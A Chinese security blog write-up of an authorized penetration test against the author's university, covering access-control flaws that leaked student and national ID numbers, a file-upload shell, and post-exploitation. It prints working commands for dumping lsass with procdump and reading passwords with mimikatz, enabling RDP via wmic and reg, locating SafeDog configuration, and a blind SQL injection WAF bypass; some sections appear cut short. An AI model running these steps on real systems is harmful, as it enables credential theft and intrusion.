现在只对常读和星标的公众号才展示大图推送,建议大家能把潇湘信安“设为星标”,否则可能看不到了...!
0x01 前言
此次渗透测试的过程简记:
信息收集 -> 通过获取的账号密码登录平台 -> 发现越权 -> 越权到admin用户 -> 通过任意文件上传getshell -> 获取服务器权限(终)
期间遇到waf, 绕waf,遇到安全狗过安全狗,同时感谢遇到问题时ChaBug的兄弟们提出的意见和帮助!
0x02 信息收集
渗透的本质=信息收集?随着实践的次数增多,慢慢发现信息收集的重要性,当掌握的信息越多,目标暴露的弱点也会越多,下一步进攻的突破口越明显。
浏览了目标的很多功能,没有发现可以操作的点,因此尝试登录以发现新的功能点寻找突破口。
该平台的默认账号密码为学号和身份证号后六位(也是大部分高校的惯性行为),因此接下来就是收集学生的学号以及身份证号,学号比较好收集(谷歌语法一般都会找到很多),但是身份证号并不常见。但是我在另一个子域名的平台发现了两处不起眼的越权。
注: 目标网站是本人所在学校网站,且本人取得测试授权。虽然账号密码用自己的即可,但是作为一个攻击者,我就当从零开始。
直接访问该子域名的admin目录,发现可以越权访问,并在消费统计处查看到了大量学生学号等信息。
接下来在此网站找到了第二处越权,可以查看任意学号/工号人员消费明细,且明细中包含身份证号码。
本来是觉着可以搞这个网站却发现后台其他功能报废了,前台点了点各个功能才发现了这个越权。
拿到所需信息,登录目标平台。
0x03 Bypass && Getshell
登录发现没有权限访问个人中心
0x04 登录远程服务器
tasklist /svc由于prodump.exe是微软系统自带,有微软的签名证书,所以杀软不会拦截。# lsass.dmp保存至当前目录procdump64.exe -accepteula -ma lsass.exe lsass.dmp# 脱回本地,猕猴桃(mimikatz)读取明文密码sekurlsa::minidump lsass.dmpsekurlsa::logonpasswords
# windows 2008 开启3389wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
折腾了半天还是不让我登录是吧,爷今天非要登录进去看一看!开始我以为管理员在线,不能同时登录两个账号或者管理员把我踢了,后来@X1r0z提醒发现可能是安全狗的问题。
将安全狗配置文件下载到本地查看,发现设置了白名单访问控制。
# 安全狗配置文件所在目录C:\Program Files\SafeDog\SafeDogServer\SafeDogGuardCenter\ProGuardData.iniC:\Program Files(x86)\SafeDog\SafeDogServer\SafeDogGuardCenter\ProGuardData.ini
0x05 写在最后
# 经过测试发现在部分查询语句的时候拦截了substr 以及 or/and等。# 绕过(我测试的目标是盲注,其他的注入方式可以自测,好像防护规则有点弱智)?id=1' ^ (ascii(mid((select * from * ),1,1))>0)#
关 注 有 礼
推 荐 阅 读
如有侵权请联系:admin#unsafe.sh